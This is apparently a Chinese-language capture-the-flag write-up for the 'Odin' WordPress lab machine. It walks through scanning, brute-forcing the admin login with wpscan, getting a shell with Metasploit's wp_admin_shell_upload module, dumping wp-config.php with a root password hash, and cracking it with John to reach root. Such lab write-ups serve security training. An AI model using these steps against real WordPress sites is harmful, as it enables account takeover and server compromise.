“ 我要成为强者,总有一天,我要变得和大叔一样强! ——天明。”
慢慢恢复曾经删除的文章...缅怀
查看题目描述
简单翻译一下:一个叫奥丁的家伙去了某个鬼地方,有个叫mimi的人让奥丁喝井水,然后奥丁的左眼睛就瞎了,并告诉他这是获得知识的代价......
emmm,好像和解答题目没什么关系,倒是下面提示貌似要更改host文件
好,开搞
打开靶机
打开kali
查看本机ip
主机发现
靶机信息收集
发现只开放了80端口,尝试访问
发现并不是真正靶机的地址
按照题目的提示 修改本地host文件
再次访问,成功跳转正常页面
这个熟悉的页面,和wp的站点非常相似。(其实在之前我们的nmap已经探测到靶机是wordpress站点)
尝试访问wp的默认登陆页面wp-admin
确实是wp的站点,那二话不多说,wpscan直接锤它一波
直接检测漏洞没有什么发现,再回到登录口看看吧
尝试进行弱口令测试
输入admin 密码随便乱输一通
提示:
Error: The password you entered for the username admin is incorrect.
诶呦,这不证明了admin用户是存在的,那这里存在账户枚举的可能
正好wpscan提供爆破账户的功能,那就利用wp再尝试一波
芜湖~拿到密码
进入后台
简单搜一下通用漏洞
好像没有关于wp5.5类的高危漏洞,不采用文件上传getshell了
我们已经获取了账号密码,考虑直接用msf反弹shell
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS odin
set username admin
set password qwerty
run
shell
查看系统基本信息
利用python3提权
python3 -c "import pty;pty.spawn('/bin/bash')"
后渗透开始,搜寻关于root的信息
先去网站目录下看看,发现相关配置文件
输出看看
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'joomla' );
/** MySQL database username */
define( 'DB_USER', 'joomla' );
/** MySQL database password */
define( 'DB_PASSWORD', 'joomla' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );
define( 'SECURE_AUTH_KEY', '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );
define( 'LOGGED_IN_KEY', 'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );
define( 'NONCE_KEY', '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );
define( 'AUTH_SALT', '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );
define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:[email protected]%twt2_z=P(([email protected]=q-5e$vg' );
define( 'LOGGED_IN_SALT', '6gs|[email protected]?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );
define( 'NONCE_SALT', 'xA+mKYMD;][email protected]>tEi%MT1!<$|<[email protected]|y2WAE=NwR5{3:piVlWHr6JsK[6u' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
一波寻找,发现关于root用户的加密密码
上神器,开膛手约翰john!
获得root密码jasmine
利用我们获取到的密码切换权限
经过一番寻找,在主目录下找到了作者的名字bjorn,输出即为Flag
喜欢的朋友劳烦点的小小的关注吧~